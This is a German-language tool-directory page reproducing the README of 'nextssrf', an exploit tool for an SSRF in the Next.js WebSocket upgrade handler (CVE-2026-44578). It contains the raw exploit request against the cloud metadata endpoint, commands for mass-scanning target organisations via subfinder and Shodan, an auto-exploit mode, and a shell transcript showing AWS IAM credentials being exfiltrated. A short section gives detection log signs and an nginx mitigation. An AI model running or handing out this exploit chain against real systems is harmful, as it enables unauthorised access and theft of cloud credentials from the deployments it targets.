Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
nextssrf — CVE-2026-44578 Scanner und Exploit-Tool für SSRF im Next.js WebSocket-Upgrade-Handler. Erkennt anfällige Versionen, extrahiert Cloud-Metadaten und exfiltriert IAM-Anmeldedaten über eine interaktive Shell. | Kitploit
Tools/GitHubGitHub/ynsmroztas/nextssrf
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationInformationsbeschaffungCloud-Sicherheit
GitHubynsmroztas/nextssrf

nextssrf

CVE-2026-44578 Scanner und Exploit-Tool für SSRF im Next.js WebSocket-Upgrade-Handler. Erkennt anfällige Versionen, extrahiert Cloud-Metadaten und exfiltriert IAM-Anmeldedaten über eine interaktive Shell.

Repository anzeigen
762013vor 4 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
╔══════════════════════════════════════════════════════════════╗
║         NextSSRF — CVE-2026-44578 Scanner & Exploit          ║
║   Next.js WebSocket Upgrade Handler SSRF                     ║
║   Affected: 13.4.13 → 15.5.15, 16.0.0 → 16.2.4              ║
║         @mitsec / ynsmroztas — Bug Bounty Tooling            ║
╚══════════════════════════════════════════════════════════════╝

Python CVE CVSS License Platform

CVE-2026-44578 — Server-Side Request Forgery über den Next.js WebSocket Upgrade Handler

Übersicht · Installation · Verwendung · Pipeline · Shodan · Interaktiv · Haftungsausschluss


Übersicht

Am 11. Mai 2026 hat Vercel CVE-2026-44578 (CVSS 8.6) gepatcht: eine nicht authentifizierte SSRF im WebSocket-Upgrade-Handler von Next.js, die alle selbst gehosteten Bereitstellungen ab 13.4.13 betrifft.

Mechanismus

GET http://169.254.169.254/latest/meta-data/ HTTP/1.1   ← absolute-form URI
Host: vulnerable-nextjs.com
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==

Das // in http:// löst normalizeRepeatedSlashes aus, setzt statusCode: 308 und finished: true. Der anfällige Upgrade-Handler ignoriert beide Flags und ruft proxyRequest auf, wenn parsedUrl.protocol truthy ist – und leitet die Anfrage an den vom Angreifer kontrollierten Host auf Port 80 weiter.

// router-server.ts (vulnerable)
- if (parsedUrl.protocol) {
-     return await proxyRequest(req, socket, parsedUrl, head)
+ if (finished && parsedUrl.protocol) {
+     if (!statusCode) {
+         return await proxyRequest(req, socket, parsedUrl, head)

Betroffene Versionen

ProduktAnfälligBehoben
Next.js13.4.13 – 15.5.1515.5.16
Next.js16.0.0 – 16.2.416.2.5
Vercel-gehostet✅ NICHT betroffenN/A

Einschränkungen

  • Nur GET (kein POST/PUT)
  • Nur Port 80 (explizite Ports werden durch URL-Normalisierung entfernt)
  • AWS IMDSv2 nicht ausnutzbar (erfordert PUT-Token)
  • GCP-Metadaten lehnen Upgrade: websocket mit 400 ab
  • Reverse-Proxies (nginx/caddy/HAProxy) blockieren absolute-form URIs

Demo

NextSSRF — AWS-Zugangsdaten exfiltriert

AWS IMDSv1-Zugangsdaten via CVE-2026-44578 exfiltriert – interaktive Exploit-Shell


Installation

git clone https://github.com/ynsmroztas/nextssrf
cd nextssrf
python3 nextssrf.py -t https://target.com

Null Abhängigkeiten — nur Python-Standardbibliothek. Python 3.10+ erforderlich.


Verwendung

Einzelziel-Scan

python3 nextssrf.py -t https://target.com

Cloud-spezifisches Targeting

# Nur AWS-Metadaten
python3 nextssrf.py -t https://target.com --cloud aws

# Benutzerdefiniertes internes Ziel
python3 nextssrf.py -t https://target.com \
  --ssrf-host http://internal-api --path /admin

# Tiefenscan (+ interne Dienste)
python3 nextssrf.py -t https://target.com --cloud aws --deep

Massenscan (Pipeline)

# subfinder + httpx + nextssrf
subfinder -d target.com | httpx -silent | \
  python3 nextssrf.py --pipe --threads 20 --cloud aws -o results.jsonl

# Dateieingabe
python3 nextssrf.py -f targets.txt --threads 15 -o results.json

# Erzwungener Scan (auch bei unbekannter Version)
python3 nextssrf.py -t https://target.com --force

Exit-Codes

CodeBedeutung
0Nicht verwundbar / sauber
1Verwundbar (kein Exploit)
2SSRF bestätigt

Interaktive Shell

Erweiterte Exploit-Shell mit automatischer Cloud-Erkennung und IAM-Zugangsdaten-Extraktion:

python3 nextssrf.py -t https://target.com
╔══════════════════════════════════════════════════╗
║  NextSSRF v2 — Interactive Exploit Shell         ║
║  Target : ec2-x-x-x-x.compute.amazonaws.com     ║
║  CVE    : CVE-2026-44578  |  Status: Connected   ║
╚══════════════════════════════════════════════════╝

nextssrf(ec2-x...)> cloud
  [>] Detecting cloud provider...
  ✓ AWS — matched: ['ami-id', 'instance-id', 'iam/', 'hostname']
  → Run 'aws' for full credential extraction

nextssrf(ec2-x...)> aws
  [1/3] Instance Information
  [200] Hostname    : ip-172-31-47-134.ec2.internal
  [200] AZ          : us-east-1d
  [200] Account ID  : {"AccountId": "370741706736"}

  [2/3] IAM Role Discovery
  ✓ IAM Role found: my-ec2-role

  [3/3] Credential Extraction
  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
  🎯 AWS CREDENTIALS EXFILTRATED!
  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
  AccessKeyId : ASIAXXXXXXXXXXXXXXXXXX
  SecretKey   : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  Expiration  : 2026-05-14T22:32:22Z

Shell-Befehle

BefehlBeschreibung
cloudCloud automatisch erkennen (AWS/Azure/GCP/DO/OCI)
awsVollständige AWS IAM-Zugangsdatenkette
azureAzure Managed Identity Token
scanCloud erkennen + automatisch ausnutzen
url <http://>Benutzerdefinierte SSRF-Anfrage
get <N>AWS IMDS-Ziel nach Index
listAlle IMDS-Endpunkte anzeigen
historyAnfrageverlauf
saveSitzung als JSON exportieren
quitBeenden

Automatik-Modus

# Cloud erkennen + vollständige Exploit-Kette automatisch ausführen
python3 nextssrf.py -t https://target.com --auto

Pipeline-Beispiele

# Vollständige Recon → Exploit-Pipeline
subfinder -d target.com \
  | httpx -silent -server \
  | grep -i "next" \
  | python3 nextssrf.py --pipe --cloud aws --deep -o findings.jsonl

# Shodan-Massenscan → interaktiv auf bestätigten Hosts
python3 shodan_nextjs.py --key KEY --org "TargetCorp" \
  | python3 nextssrf.py --pipe --cloud aws -o hits.jsonl

# Bestimmten Versionsbereich prüfen
cat hosts.txt \
  | python3 nextssrf.py --pipe --force --cloud aws \
  | jq '.[] | select(.ssrf_hits | length > 0)'

Erkennung (Blue Team)

Anzeichen für Ausnutzung in Logs:

# Next.js-Prozesslogs
Failed to proxy http:/   ← einzelner Schrägstrich = Normalisierungs-Fingerabdruck

# Zugriffslogs (absolute-form URI + Upgrade-Header)
GET http://169.254.169.254/... HTTP/1.1
Connection: Upgrade
Upgrade: websocket

Gegenmaßnahmen (falls Patch nicht möglich)

# Nginx: absolute-form Request-URIs ablehnen
if ($request_uri ~* "^https?://") {
    return 400;
}

Referenzen

  • GHSA-c4j6-fc7j-m34r
  • NVD CVE-2026-44578
  • Next.js Sicherheitsrelease Mai 2026
  • Hadrian Technische Analyse

Haftungsausschluss

Tool herunterladen